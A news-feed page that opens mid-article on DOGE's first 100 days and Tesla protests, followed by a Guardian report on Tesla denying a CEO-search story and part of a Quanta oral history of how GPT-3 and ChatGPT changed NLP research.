with security officials who tried to bar them from accessing a secure room which held sensitive and confidential data. The confrontation ended with USAID’s top security official being put on administrative leave, while Doge gained access to its systems. With no one to stop them, Doge staffers then began the process of
hollowing out the agency
that had once been the world’s largest single supplier of humanitarian aid. More than 5,600 USAID workers around the world
would be fired
in the ensuing weeks.
“We spent the weekend feeding
USAID
into the wood chipper,” Musk boasted days later on X, his social media platform.
Musk moves to gut the government
Doge’s targeting of USAID turned out to be a blueprint for how Musk and company would go after other parts of the government. In early February, Musk’s team had established a presence across federal agencies and placed itself at the fulcrum of government employment systems. The next step was mass layoffs.
“We do need to delete entire agencies,” Musk
told
attendees at a World Governments Summit in Dubai on 13 February. “If we don’t remove the roots of the weed, then it’s easy for the weed to grow back.”
The same day as Musk’s remarks, the Trump administration
ordered agencies to fire thousands
of probationary workers – a designation that applies to employees who have been at their jobs for less than a year, including those who may have been recently promoted. Other workers soon received an email from Doge that demanded they
list five things
that they did last week or face termination, a chaotic request that also turned out to be an empty threat.
Cabinet officials
privately
deemed it nonsensical
.
Amid the widespread cuts, Musk began reveling in his new powers both on X and in public appearances. At the Conservative Political Action Conference (CPAC) on 23 February he stood on stage in a black Maga hat, sunglasses and gold chain, gleefully
wielding a chainsaw
that was gifted to him by Javier Milei, the rightwing populist Argentinian president.
“This chainsaw is for bureaucracy!” he said. “I am become meme.”
While Musk celebrated his first cuts, Doge began going after entire offices and agencies it viewed as politically progressive or opposed to its goals. The GSA’s
18F office
, which helped build software projects such as the IRS’s free tax filing service, was one of the first targets. On 3 February, Musk told a rightwing influencer on X that the office was “deleted” in response to an inaccurate post accusing the group of being radical leftists. Employees at the 18F office asked their new Musk-allied leadership what “deleted” meant, former workers said, but received no further clarification. The employees continued working for weeks under a cloud of confusion and tension with their new leaders, until the middle of the night on Saturday 1 March, when they
received an email
saying they were going to be laid off en masse.
“We were living proof that the talking points of this administration were false. Government services can be efficient,” Lindsay Young, the former executive director of 18F, said in a post on LinkedIn. “This made us a target.”
Doge’s influence soon extended beyond government tech offices into major agencies such as the Department of Health and Human Services, which
announced in March
that it was cutting 10,000 jobs to align with Trump’s executive order on Doge. In a display of the chaos that Doge had inspired, US health secretary Robert F Kennedy Jr weeks later admitted that around 2,000 of those workers
were fired in error
and would need to be reinstated.
Musk fights the judicial system
As soon as Trump issued the executive order to create Doge,
watchdog
and
labor groups
filed lawsuits challenging its legality. More lawsuits piled on as Doge accessed sensitive data systems, fired workers and refused to respond to public records requests. Altogether, there have now been more than two dozen cases targeting the agency.
At first, Doge and Musk seemed to move faster than the judicial system could respond as they slashed and burned government agencies. Around the start of March, however, many of the court cases
began to produce rulings
that curtailed Doge’s layoffs and temporarily blocked its staff’s access to data. Judges ruled that the Trump administration
needed to reinstate
probationary workers that they fired,
limited some Doge access
to databases at agencies such as the Social Security Administration and
ordered Musk’s team
to turn over internal records it had been seeking to keep private.
Musk’s reaction was a constant stream of
attacks against the judicial system
on X, which included
demands
that lawmakers “impeach the judges” and claims that there was a “judicial coup” under way against Trump. Musk repeatedly amplified far-right influencers saying that the US should emulate El Salvador’s strongman president, Nayib Bukele, whose
party ousted
supreme court judges in 2021 in a slide toward authoritarianism.
While Musk campaigned against federal judges that were increasing oversight and forcing more transparency on Doge, he also began plowing money
into a Wisconsin supreme court race
that would have tipped the state’s judicial body conservative. The billionaire and the groups he funded put more than $20m toward electing a conservative judge, which he claimed was crucial to “the future of civilization”.
The attempt to
influence the Wisconsin vote
followed his blueprint from the presidential race. His Super Pac offered $100 to voters willing to sign a petition stating their opposition to “activist judges”, and he held a campaign rally where he
gave out
$1m dollar checks on stage. Musk’s effort
failed to convince voters
, with his preferred candidate
losing
by 10 percentage points.
The outcome of the Wisconsin supreme court race proved to be the first in a series of setbacks that tested the limits of Musk’s political influence and the
toxicity of his personal brand
. As the billionaire embraced his new role as a Republican mega-donor and placed himself often literally at center stage, it became clear that his routine
did not always play well
outside of the insulated bubbles of Maga rallies and Tesla product launches. While people saw more and more of Musk,
polls showed
that the
public liked him
less and less
.
Protests boom against Musk and Tesla
As Musk’s association with Trump and the international far right became too prominent to ignore over the past year, there has been a rising social stigma against associating with his products. The most tangible symbol of Musk’s empire,
Tesla
, has become the focus of an international protest movement since the creation of Doge.
SpaceX
, the second-largest source of Musk’s wealth, has seemed insulated from the vicissitudes of consumer sentiment and increased its role in US space operations.
Protests at Tesla dealerships, as well as vandalism against individual cars,
started small
in the weeks after inauguration, with gatherings of a few dozen people in cities including New York City and San Francisco. Some Tesla owners sold their cars
due to the association with Musk
or placed “I bought this before we knew Elon was crazy” bumper stickers on their vehicles. The demonstrations quickly escalated to more cities, though, organizing under the banner of
“Tesla Takedown” protests
that targeted showrooms around the country.
By mid-March, a fully fledged international protest movement against Tesla and Musk had formed and brought about mass protests. Thousands of people
gathered at showrooms
from Sydney to San Francisco on 30 March in a day of action, with organizers stating that “hurting Tesla is stopping Musk”. Vandalism against Tesla dealerships, charging stations and cars also
intensified around the world
, including multiple
molotov cocktail attacks
and
incidents of arson
. Trump and Musk called the attacks domestic terrorism, while Pam Bondi, the attorney general,
vowed to crack down
on anyone targeting Tesla.
The pressure on Tesla represented a real threat to the company, which was already dealing with an overall sluggish market for electric vehicles and increased competition from Chinese automakers. As protests spread, Musk leaned on his status in Maga world to attempt to revitalize the brand.
Trump appeared
on the White House driveway in front of several parked Teslas, telling reporters that he was going to buy one of them and praising Musk as a “patriot”. Others in Trump’s orbit, including Fox News host Sean Hannity, also posted sales pitches for the automaker.
Despite praise from Trump and Musk’s assurances to workers and investors that they
should not sell Tesla stock
, analysts reported that the protests along with other economic issues were nevertheless taking a toll. A stock selloff has resulted in Tesla’s share price falling around 25% since the start of the year, wiping billions of dollars from Musk’s net worth. A first-quarter earnings call on 22 April revealed Tesla’s performance
was even worse
than expectations, with a 71% drop in profits and 9% drop in revenue year over year.
Musk announced on the call that he would spend
significantly less time
working on Doge starting sometime in May.
Musk eyes an exit, but Doge remains
Musk’s declaration that he would pare back his time with Doge to one or two days a week gave a more definitive sense of his exit after weeks of
speculation
about when and how he would leave the White House. Although Trump has remained adamant that Musk is doing a good job and remains welcome in the administration, a growing chorus of top officials have either openly feuded with him or privately griped about his presence throughout his first 100 days.
Musk has had intense clashes with secretary of state Marco Rubio, transportation secretary Sean Duffy and several other top Trump staffers. He reportedly got into a
near-physical shouting match
with treasury secretary Scott Bessent in recent weeks, and has publicly called chief trade adviser
Peter Navarro
, the architect of Trump’s tariff policies,
“dumber than a sack of bricks”
.
The power struggles between Musk and administration officials leave it unclear how much say Doge will have without Musk constantly placed at the right hand of the president, but his allies are still spread throughout the government and actively working on carrying out his mission. Doge has continued to target agencies throughout April,
gutting smaller groups
such as an agency that coordinates government policy on homelessness, and eyeing others including the
Peace Corps
for mass layoffs.
Some of Doge’s cuts have directly targeted agencies that oversee Musk’s companies, including at the
National Highway Traffic Safety Administration
that regulates and investigates the risks of self-driving cars. Shifts in priorities and leadership at agencies such as Nasa and the Pentagon also put SpaceX in a position to
potentially make billions
off of new contracts, while former government employees say it is likely Doge
already has access
to confidential business data on SpaceX’s competitors.
While part of the Doge team is still finding workers to fire, other members have begun accessing even more data systems and are starting to put them to work. One target has been immigration, where Doge staff have accessed personal information that includes therapy records for
unaccompanied migrant children
,
housing information
and biometric data. The goal, multiple outlets
have
reported
, is to create a master database that could be used to enforce the Trump administration’s deportations and other anti-immigration maneuvers.
Mission accomplished?
As Doge’s purpose has become more amorphous over its first three months, its initially advertised goal of cutting $1-2tn from the budget has moved further from view. Musk has instead shifted the goal posts, saying that he expects to find $150bn in savings this year – a fraction of his original goal and a small dent in the overall federal budget. That number may also be an illusion, as Doge’s tally of its savings has been filled with constant errors and miscalculations. Much of Doge’s savings could
also be erased
by the costs of defending itself in court and
losses associated
with its mass layoffs.
The real effects of Doge’s first 100 days are still playing out. Dismantling USAID is
projected to cause
around
176,000 excess deaths
, more than half of them children, according to a Boston University tracking project. Cuts to agencies such as the
National Oceanic and Atmospheric Association
and Federal Emergency Management Agency could imperil natural disaster forecasting and relief. Agencies such as
Veterans Affairs
that provide public services may deteriorate, while cuts to research and education programs
may be felt for decades
to come.
“The amazing thing is that they haven’t actually done anything constructive whatsoever. Literally all they’ve done is destroy things,” a current federal employee said of Doge. “People are going to miss the federal government that they had.”
Understanding Kafka KRaft: How Controllers and Brokers Talk in the Zookeeper-less World
Tesla denies report claiming board looked to replace Elon Musk
Guardian
www.theguardian.com
2025-05-01 09:03:11
Wall Street Journal article saying headhunters were contacted branded ‘absolutely false’ by chair Robyn Denholm Tesla has denied a report that its board sought to replace Elon Musk as its chief executive amid a backlash against his rightwing politics and declining car sales. Robyn Denholm, the chair...
Tesla has denied a report that its board sought to replace
Elon Musk
as its chief executive amid a backlash against his rightwing politics and declining car sales.
Robyn Denholm, the chair of the board at the electric carmaker, said in a statement on Tesla’s social media account on X: “Earlier today, there was a media report erroneously claiming that the
Tesla
Board had contacted recruitment firms to initiate a CEO search at the company.
“This is absolutely false (and this was communicated to the media before the report was published). The CEO of Tesla is Elon Musk and the Board is highly confident in his ability to continue executing on the exciting growth plan ahead.”
Tesla CEO Elon Musk.
Photograph: Evelyn Hockstein/Reuters
It followed a Wall Street Journal story published on Wednesday that claimed “board members” had contacted headhunters to recruit a successor about a month ago.
It is unclear in the report whether these members were acting on behalf of the board as a collective, or if it was only some of them taking steps to find a new chief executive. The Tesla board is made up of eight people, including Elon Musk himself, his brother, Kimbal Musk, and James Murdoch, son of media mogul Rupert Murdoch.
Tesla has been hit by a widespread backlash against Musk’s recent political activity, not only against his Doge work, but also his public support for the far-right Alternative for Germany (AfD) party before German national elections in February. Sales of the electric car have dropped in some of its biggest markets and there have been political protests at some of its showrooms.
Last week, the
company reported that profits had dropped by 71%
in the first quarter of this year to $409m (£307m), compared with $1.39bn in the same period in 2024. Meanwhile, Tesla’s stock has suffered, with the company losing about a quarter of its market value this year.
Musk told investors that starting from May he would be
“allocating far more of my time to Tesla”.
He is scheduled to leave Doge on 30 May, according to a strict 130-day cap on his service as a special government employee.
There have long been concerns around the demands on Musk’s time. As well as Tesla, he oversees four other companies, including the space exploration company SpaceX and the social media platform X, formerly known as Twitter.
Musk denounced the Wall Street Journal report on X on Thursday. He wrote: “It is an EXTREMELY BAD BREACH OF ETHICS that the @WSJ would publish a DELIBERATELY FALSE ARTICLE and fail to include an unequivocal denial beforehand by the Tesla board of directors!”
When ChatGPT Broke an Entire Field: An Oral History
Something very significant has happened to the field.
And also to people.
—Christopher Potts
A
sking scientists to identify a paradigm shift, especially in real time, can be tricky. After all, truly ground-shifting updates in knowledge may take decades to unfold. But you don’t necessarily have to invoke the P-word to acknowledge that one field in particular —
natural language processing
, or NLP — has changed. A lot.
The goal of natural language processing is right there on the tin: making the unruliness of human language (the “natural” part) tractable by computers (the “processing” part). A blend of engineering and science that dates back to the 1940s, NLP gave Stephen Hawking a voice, Siri a brain and social media companies another way to target us with ads. It was also ground zero for the emergence of large language models — a technology that NLP helped to invent but whose explosive growth and transformative power still managed to take many people in the field entirely by surprise.
To put it another way: In 2019,
Quanta
reported on a then-groundbreaking
NLP system called BERT
without once using the phrase “large language model.” A mere five and a half years later, LLMs are everywhere, igniting discovery, disruption and debate in whatever scientific community they touch. But the one they touched first — for better, worse and everything in between — was natural language processing. What did that impact feel like to the people experiencing it firsthand?
Quanta
interviewed 19 current and former NLP researchers to tell that story. From experts to students, tenured academics to startup founders, they describe a series of moments — dawning realizations, elated encounters and at least one “existential crisis” — that changed their world. And ours.
* * *
Prologue: Before the Flood
transformers • BERTology • scale
By 2017,
neural networks
had already changed the status quo in NLP. But that summer, in a now-seminal paper titled “
Attention Is All You Need
,” researchers at Google introduced an entirely new kind of neural network called the transformer that would soon dominate the field. Not everyone saw it coming.
ELLIE PAVLICK
(assistant professor of computer science and linguistics, Brown University; research scientist, Google DeepMind)
:
Google had organized a workshop in New York for academics to hang out with their researchers, and Jakob Uszkoreit, one of the authors on that paper, was presenting on it. He was making a really clear point about how aggressively this model was not designed with any insights from language. Almost trolling a bit: I’m going to just talk about all these random decisions we made, look how absurd this is, but look how well it works.
There had already been a feeling of the neural nets taking over, and so people were very skeptical and pushing back. Everyone’s main takeaway was, “This is all just hacks.”
RAY MOONEY
(director, UT Artificial Intelligence Laboratory, University of Texas at Austin)
:
It was sort of interesting, but it wasn’t an immediate breakthrough, right? It wasn’t like the next day the world changed. I really do think it’s not conceptually the right model for how to process language. I just didn’t realize that if you trained that very conceptually wrong model on a lot of data, it could do amazing things.
NAZNEEN RAJANI
(founder and CEO, Collinear AI; at the time a Ph.D. student studying with Ray Mooney)
:
I clearly remember reading “Attention Is All You Need” in our NLP reading group. Ray actually ran it, and we had this very lively discussion. The concept of
attention
had
been around for a while
, and maybe that’s why Ray’s reaction was kind of, “Meh.” But we were like, “Wow, this seems like a turning point.”
R. THOMAS MCCOY
(assistant professor, department of linguistics, Yale University)
:
During that summer, I vividly remember members of the research team I was on asking, “Should we look into these transformers?” and everyone concluding, “No, they’re clearly just a flash in the pan.”
CHRISTOPHER POTTS
(chair, department of linguistics, Stanford University)
:
The transformers paper passed me by. Even if you read it now, it’s very understated. I think it would be very hard for anyone to tell from the paper what effect it was going to have. That took additional visionary people, like the BERT team.
Soon after it was
introduced
in October 2018, Google’s open-source transformer BERT (and a lesser-known model from OpenAI named GPT) began shattering the performance records set by previous neural networks on many language-processing tasks. A flurry of “
BERTology
” ensued, with researchers struggling to determine what made the models tick while scrambling to outdo one another on benchmarks — the standardized tests
that helped measure progress in NLP
.
ANNA ROGERS
(associate professor of computer science, IT University of Copenhagen; editor-in-chief, ACL Rolling Review)
:
There was this explosion, and everybody was writing papers about BERT. I remember a discussion in the [research] group I was in: “OK, we will just have to work on BERT because that’s what’s trending.” As a young postdoc, I just accepted it: This is the thing that the field is doing. Who am I to say that the field is wrong?
JULIAN MICHAEL
(head of the safety, evaluations and alignment lab, Scale AI; at the time a Ph.D. student at the University of Washington)
:
So many projects were dropped on the floor when BERT was released. And what happened next was, progress on these benchmarks went way faster than expected. So people are like, “We need more benchmarks, and we need harder benchmarks, and we need to benchmark everything we can.”
Some viewed this “benchmark boom” as a distraction. Others saw in it the shape of things to come.
SAM BOWMAN
(member of technical staff, Anthropic; at the time an associate professor at New York University)
:
When people submitted benchmark results and wanted to appear on the leaderboard, I was often the one who had to check the result to make sure it made sense and wasn’t just someone spamming our system. So I was seeing every result come in, and I was noticing how much of it was just, increasingly, old or simple ideas scaled up.
JULIAN MICHAEL:
It became a scaling game: Scaling up these models will increase their ability to saturate any benchmark we can throw at them. And I’m like, “OK, I don’t find this inherently interesting.”
SAM BOWMAN:
The background assumption was, “Transformers aren’t going to get much better than BERT without new breakthroughs.” But it was becoming clearer and clearer for me that scale was the main input to how far this is going to go. You’re going to be getting pretty powerful general systems. Things are going to get interesting. The stakes are going to get higher.
So I got very interested in this question: All right, what happens if you play that out for a few years?
* * *
I. The Wars of The Roses (2020–22)
“understanding wars” • GPT-3 • “a field in crisis”
As transformer models approached (and surpassed) “human baselines” on various NLP benchmarks, arguments were already brewing about how to interpret their capabilities. In 2020, those arguments — especially about “meaning” and “understanding” — came to a head in a
paper imagining an LLM as an octopus
.
EMILY M. BENDER
(professor, department of linguistics, University of Washington; 2024 president, Association for Computational Linguistics)
:
I was having these just unending arguments on Twitter, and grumpy about it. There was one about using BERT to unredact the Mueller report, which is a terrible idea. It seemed like there was just a never-ending supply of people who wanted to come at me and say, “No, no, no, LLMs really do understand.” It was the same argument over and over and over again.
I was talking with [computational linguist]
Alexander Koller
, and he said: “Let’s just write the
academic paper version of this
so that it’s not just ideas on Twitter, but peer-reviewed research. And that’ll put an end to it.” It did not put an end to it.
Bender and Koller’s “octopus test” asserted that models trained only to mimic the form of language through statistical patterns could never engage with its meaning — much as a “hyperintelligent octopus” would never really understand what life was like on land, even if it fluently reproduced the patterns it observed in human messages.
SAM BOWMAN:
This argument — that “there’s nothing to see here,” that neural network language models are fundamentally not the kind of thing that we should be interested in, that a lot of this is hype — that was quite divisive.
JULIAN MICHAEL:
I got involved in that. I wrote this
takedown of the paper
— it was the one blog post I’ve ever written, and it was the length of a paper itself. I worked hard to make it a good-faith representation of what the authors were saying. I even got Emily to read a draft of my post and correct some of my misunderstandings. But if you read between the lines, I am eviscerating. Just with a smile on my face.
ELLIE PAVLICK:
These “understanding wars” — to me, that’s when a reckoning was really happening in the field.
Meanwhile, another reckoning — driven by real-world scale, not thought experiments — was already underway. In June of 2020,
OpenAI released GPT-3
, a model more than 100 times as large as its previous version and much more capable. ChatGPT was still years away, but for many NLP researchers, GPT-3 was the moment when everything changed. Now Bender’s octopus was real.
CHRISTOPHER CALLISON-BURCH
(professor of computer and information science, University of Pennsylvania)
:
I got early access to the GPT-3 beta and was actually playing with it myself. I’m trying out all the things that my recent Ph.D. students had done as their dissertations, and just realizing — oh my God, the thing that had taken a student five years? Seems like I could reproduce that in a month. All these classical NLP tasks, many of which I had touched on or actively researched throughout my career, just felt like they worked in one shot. Like, done. And that was just really, really shocking. I sometimes describe it as having this career-existential crisis.
NAZNEEN RAJANI:
When I tried GPT-3 out, it had a lot of limitations around safety. When you asked questions like, “Should women be allowed to vote?” it would say no, and things like that. But the fact that you could just teach it to do a completely new task in, like, three or four lines of natural language was mind-boggling.
CHRISTOPHER POTTS:
Somebody in our group got early access to the GPT-3 API. And I remember standing in my office, right where I’m standing now, thinking: I’m going to prompt it with some logic questions and it’s going to fail at them. I’m going to reveal that it has just memorized all the things that you’re so impressed by. I’m going to show you that this is a party trick.
I remember trying, and trying again. Then I had to fess up to the group: “Yeah, this is definitely much more than a party trick.”
YEJIN CHOI
(professor of computer science, Stanford University; 2022 MacArthur fellow)
:
It was still broken. A lot of commonsense knowledge [coming] out of GPT-3 was quite noisy. But GPT-2 was near zero — it was no good. And GPT-3 was about two-thirds good, which I found was quite exciting.
R. THOMAS MCCOY:
This
GPT-3 paper
was sort of like the series finale of “Game of Thrones.’’ It was the thing that everyone had just read and everyone was discussing and gossiping about.
LIAM DUGAN
(fourth-year Ph.D. student, University of Pennsylvania)
:
It almost was like we had a secret, and everyone you shared it with was blown away. All I had to do was bring someone over to my laptop.
JULIAN MICHAEL:
BERT was a phase transition in the field, but GPT-3 was something more visceral. A system that produces language — we all know the
ELIZA effect
, right? It creates a much stronger reaction in us. But it also did more to change the practical reality of the research that we did — it’s like, “In theory, you can do anything [with this].” What are the implications of that? This huge can of worms opened up.
OpenAI did not publicly release GPT-3’s source code. The combination of massive scale, disruptive capability and corporate secrecy put many researchers on edge.
SAM BOWMAN:
It was bit of a divisive moment because GPT-3 was not really coming from the NLP community. It was really frowned upon for a while to publish results of studies primarily about GPT-3 because it was [seen as] this private artifact where you had to pay money to access it in a way that that hadn’t usually been the case historically.
ANNA ROGERS:
I was considering making yet another benchmark, but I stopped seeing the point of it. Let’s say GPT-3 either can or cannot continue [generating] these streams of characters. This tells me something about GPT-3, but that’s not actually even a machine learning research question. It’s product testing for free.
JULIAN MICHAEL:
There was this term, “API science,’’ that people would use to be like: “We’re doing science on a product? This isn’t science, it’s not reproducible.” And other people were like: “Look, we need to be on the frontier. This is what’s there.”
TAL LINZEN
(associate professor of linguistics and data science, New York University; research scientist, Google)
:
For a while people in academia weren’t really sure what to do.
This ambivalence was even shared by some within industry labs such as Microsoft, which exclusively licensed GPT-3, and Google.
KALIKA BALI
(senior principal researcher, Microsoft Research India)
:
The Microsoft leadership told us pretty early on that this was happening. It felt like you were on some rocket being thrown from Earth to the moon. And while [that] was very exciting, it was going at a pace that meant you really had to look at all your navigation instruments to make sure you’re still headed in the right direction.
EMILY M. BENDER:
Timnit Gebru [at the time, an AI ethics researcher at Google] approached me in a Twitter DM exchange, asking if I knew of any papers about the possible downsides of making language models bigger and bigger. At Google, she saw people around her constantly pushing: “OpenAI’s is bigger. We’ve got to make ours bigger.” And it was her job to say, “What could go wrong?”
The paper that Bender subsequently wrote with Gebru and her colleagues — “
On the Dangers of
Stochastic Parrots
: Can Language Models Be Too Big?
”
— injected moral urgency into the field’s core (and increasingly sore) arguments around form versus meaning and method versus scale. The result was a kind of civil war in NLP.
KALIKA BALI:
Some of the points that Emily makes are things that we should be thinking about. That was the year that the NLP community suddenly decided to worry about how it had neglected everything except the top five languages in the world — nobody ever talked about these things earlier. But what I did not like was that the entire NLP community kind of organized themselves for and against the paper.
R. THOMAS MCCOY:
Are you pro- or anti-LLM? That was in the water very, very much at this time.
JULIE KALLINI
(second-year computer science Ph.D. student, Stanford University)
:
As a young researcher, I definitely sensed that there were sides. At the time, I was an undergraduate at Princeton University. I remember distinctly that different people I looked up to — my Princeton research adviser [Christiane Fellbaum] versus professors at other universities — were on different sides. I didn’t know what side to be on.
KALIKA BALI:
It was positive that that paper came out, but it was also stressful to see people that you really respect drawing swords at each other. I actually went off Twitter. I got stressed about it.
LIAM DUGAN:
As a Ph.D. student, the tension arises: If you want to do research that has any sort of lasting impact more than two or three years after you publish, you kind of have to take a side. Because it dictates so much of the way that you even look at problems.
I regularly read people from both sides. Usually you just subscribed to Substacks to see the angry linguistics side, and you’d go on Twitter to see the pro-scaling side.
JEFF MITCHELL
(assistant professor in computer science and AI, University of Sussex)
:
It felt a little abnormal, quite how controversial that all became.
As scale-driven research continued to accelerate, some felt that discourse within the field was seriously deteriorating. In an attempt to repair it, the NLP research community
surveyed itself
in the summer of 2022 on “30 potentially controversial positions” — including “Linguistic structure is necessary,” “Scaling solves practically any important problem” and “AI could soon lead to revolutionary societal change.”
SAM BOWMAN:
The industry community that was doing a lot of this early work around scaling had never been that closely engaged with academic NLP. They were seen as outsiders. That led to a divergence in understanding and what people thought was happening between these two [groups], because they weren’t talking to each other that much.
LIAM DUGAN:
They gave a large part of the survey out at ACL [Association for Computational Linguistics, the field’s top conference] that year. This was the first conference I’d ever been to, and it was very exciting for me because there’s all these people that are really smart. So I get the survey, and I’m reading it on my phone, and I’m just like, “They sound like nutcases.”
JULIAN MICHAEL:
It was already a field in crisis. The survey just gave us a stronger sense.
LIAM DUGAN:
You got to see the breakdown of the whole field — the sides coalescing. The linguistic side was not very trusting of raw LLM technology. There’s a side that’s sort of in the middle. And then there’s a completely crazy side that really believed that scaling was going to get us to general intelligence.
At the time, I just brushed them off. And then ChatGPT comes out.
* * *
II. Chixculub (November 2022 through 2023)
ChatGPT • rude awakenings • “drowned out in noise”
IZ BELTAGY
(lead research scientist, Allen Institute for AI; chief scientist and co-founder, SpiffyAI)
:
In a day, a lot of the problems that a large percentage of researchers were working on — they just disappeared.
CHRISTOPHER CALLISON-BURCH:
I didn’t predict it. I don’t think anyone did. But I was prepared for it because I had gone through that experience with GPT-3 earlier.
R. THOMAS MCCOY:
It’s reasonably common for a specific research project to get scooped or be eliminated by someone else’s similar thing. But ChatGPT did that to entire types of research, not just specific projects. A lot of higher categories of NLP just became no longer interesting — or no longer practical — for academics to do.
SAM BOWMAN:
It felt like the field completely reoriented.
IZ BELTAGY:
I sensed that dread and confusion during EMNLP [Empirical Methods in Natural Language Processing], which is one of the leading conferences. It happened in December, a week after the release of ChatGPT. Everybody was still shocked: “Is this going to be the last NLP conference?” This is actually a literal phrase that someone said. During lunches and cocktails and conversations in the halls, everybody was asking the same question: “What is there that we can work on?”
NAZNEEN RAJANI:
I had just given a keynote at EMNLP. A few days after that, Thom Wolf, who was my manager at Hugging Face and also one of the co-founders, messages me, “Hey, can you get on a call with me ASAP?” He told me that they had fired people from the research team and that the rest would either be doing pre-training or post-training — which means that you are either building a
foundation model
or you’re taking a foundation model and making it an instruction-following model, similar to ChatGPT. And he said, “I recommend you pick one of these two if you want to continue at Hugging Face.”
It didn’t feel like what the Hugging Face culture stood for. Until then, everyone was basically just doing their own research, what they wanted to do. It definitely felt not so good.
Rude awakenings also came from the bottom up — as one eminent NLP expert found out firsthand while teaching her undergraduate course in the weeks after ChatGPT’s release.
CHRISTIANE FELLBAUM
(lecturer with the rank of professor of linguistics and computer science, Princeton University)
:
We had just started our semester. Just before class, a student whom I didn’t know yet came up to me, showed me a paper with my name and title on it and said: “I really want to be in your class — I’ve researched your work and I have found this paper from you, but I have a few questions about it. Could you answer them?”
And I said, “Well, sure.” I was flattered: He’s researching me, how nice. So I leafed through the paper. And while I was trying to refresh my memory, he broke out in hysterical laughter. I said, “What’s funny?” And he said: “This paper was written by ChatGPT. I said, ‘Write me a paper in the style of Christiane Fellbaum,’ and this is what came out.”
Now, I didn’t read every line, because I had to start class in 10 minutes. But everything looked like what I would write. He totally fooled me. And I went into class and thought, “What am I going to do?”
Over the next year, doctoral students faced their new reality, too. ChatGPT threatened their research projects and possibly their careers. Some coped better than others.
CHRISTOPHER CALLISON-BURCH:
It helps to have tenure when something like this happens. But younger people were going through this crisis in a more visceral way. Some Ph.D. students literally formed support groups for each other.
LIAM DUGAN:
We just kind of commiserated. A lot of Ph.D. students that were further on than me, that had started dissertation work, really had to pivot hard. A lot of these research directions, it’s like there’s nothing intellectual about them left. It’s just, apply the language model and it’s done.
Weirdly enough, nobody [I knew] quit. But there was a bit of quiet quitting. Just kind of dragging your feet or getting very cynical.
RAY MOONEY:
One of my own [graduate students] thought about dropping out. They thought that maybe the real action was happening in industry and not in academia. And I thought, you know, maybe they weren’t wrong about that. But I’m glad they decided to stay in.
JULIE KALLINI:
Starting my Ph.D. in 2023, it was an uncertain place to be. I was really unsure about where my direction would end up, but everyone was in the same boat. I think I just came to deal with it. I tried to make sure that I know my machine learning fundamentals well. It’s not the wisest thing to only specialize in potentially fleeting trends in large language models.
Meanwhile, NLP researchers from Seattle to South Africa faced a firehose of global attention, not all of it good.
VUKOSI MARIVATE
(ABSA UP chair of data science, University of Pretoria; co-founder,
Masakhane
)
:
I don’t know how many tutorials I gave on LLMs in 2023. On one hand, you’ve been trying to talk to people for years and say, “There’s interesting stuff that’s happening here.” Then all of a sudden, it’s just a complete waterfall of, “Come explain this to us.”
SAM BOWMAN:
It goes from a relatively sleepy field to, suddenly, I’m having lunch with people who were meeting with the Pope and the President in the same month.
EMILY M. BENDER:
Between January and June, I counted five workdays with no media contact. It was nonstop.
ELLIE PAVLICK:
Before ChatGPT, I don’t think I ever talked to a journalist. Maybe once or twice. After ChatGPT,
I was on
60 Minutes
. It was a huge qualitative difference in the nature of the work.
CHRISTOPHER CALLISON-BURCH:
I felt like my job went from being an academic with a narrow audience of graduate students and other researchers in my field to being like, “Hey, there’s an important responsibility for scientific communication here.” I got invited to
testify
before Congress.
LIAM DUGAN:
As a second-year Ph.D. student, I was suddenly being asked for my opinion in interviews. At the time, it felt very cool, like, “I’m such an expert in this!” Then it felt less exciting and more sort of overwhelming: “Where do you see this going in the future?” I don’t know. Why are you asking me?
Of course, I would answer confidently. But it’s crazy: There’s thousands of papers. Everyone has their hot take on what’s going on. And most of them have no idea what they’re talking about.
SAM BOWMAN:
There was this flowering of great engagement: Suddenly a lot of really amazing people from a lot of fields were looking at this stuff. And it was also getting drowned out in noise: everyone talking about this stuff all the time, lots and lots of really dashed-off takes that didn’t make any sense. It was great, and it was unfortunate.
NAZNEEN RAJANI:
That year was kind of a roller coaster.
In December 2023, one year after ChatGPT’s release, the annual EMNLP conference convened again in Singapore.
LIAM DUGAN:
The temperature was just so much higher, and the flood of arxiv [preprint] results was just so intense. You would walk the halls: All the way down, it was just prompting and evaluation of language models.
And it felt very different. At the very least, it felt like there were more people there than good research ideas. It had stopped feeling like NLP, and more like AI.
* * *
III. Mutatis Mutandis (2024–25)
LLM-ology • Money • Becoming AI
For NLP, the LLM-generated writing was on the wall — and it said different things to different people in the field.
R. THOMAS MCCOY:
Anytime you’re doing work that asks about the abilities of an AI system, you ought to be looking at systems for which we have access to the training data. But that’s not at all the prevalent approach in the field. In that sense, we’ve become more “LLM-ologists” than scientists.
ELLIE PAVLICK:
I am 100% guilty of this. I often say this when I give talks: “Right now, we are studying language models.” I get how myopic that seems. But you have to see this really long-game research agenda where it fits. In my mind, there’s not a path forward to understanding language that doesn’t have an account of “What are LLMs doing?”
KALIKA BALI:
Every time there’s been a technological disruption that mainly comes from the West, there’s always been these — if you may call it — philosophical concerns. Whereas in most of the Global South, we’ve kind of gone with, “How do we make it work for us here and now?”
Here’s a tiny example. In India, the initial idea that everyone gathered around [after ChatGPT came out] was to have generative language models do their work in English and then put a translation system in front of it to output into whatever language you wanted. But machine translation systems are literal. So if you have a math problem that says, “John and Mary have a key lime pie to divide,” and you translate it into Hindi, I can bet you most people in India do not know what a key lime pie is. How would you translate that into something culturally specific, unless the model itself is made to understand things? I became much more interested in how to solve that.
IZ BELTAGY:
There is a point where you realize that in order to continue advancing the field, you need to build these huge, expensive artifacts. Like the Large Hadron Collider — you can’t advance experimental physics without something like this.
I was lucky to be at Ai2, which generally has more resources than most academic labs. ChatGPT made it clear that there’s a huge gap between OpenAI and everybody else. So right after, we started thinking about ways we can build these things from scratch. And this is exactly what happened.
In 2024, Ai2’s
OLMo
provided a fully open-source alternative to the increasingly crowded field of industry-developed language models. Meanwhile, some researchers who had continued to study these proprietary systems — which only grew in scale, capability and opaqueness in the post-ChatGPT AI boom — were already encountering a new kind of resistance.
YEJIN CHOI:
I had this paper [in late 2023] demonstrating how the latest GPT models, which were seemingly good at doing multiplication,
suddenly get very bad at it
when you used three- or four-digit numbers. The reactions to this were super-divisive. People who don’t do empirical research at all were saying, “Did you do your experiments correctly?” That had never happened before. They were emotional reactions. I really like these people, so I was not put off by them or anything. I was just surprised by how powerful this thing is. It was almost as if I’d hurt their baby. It was eye-opening.
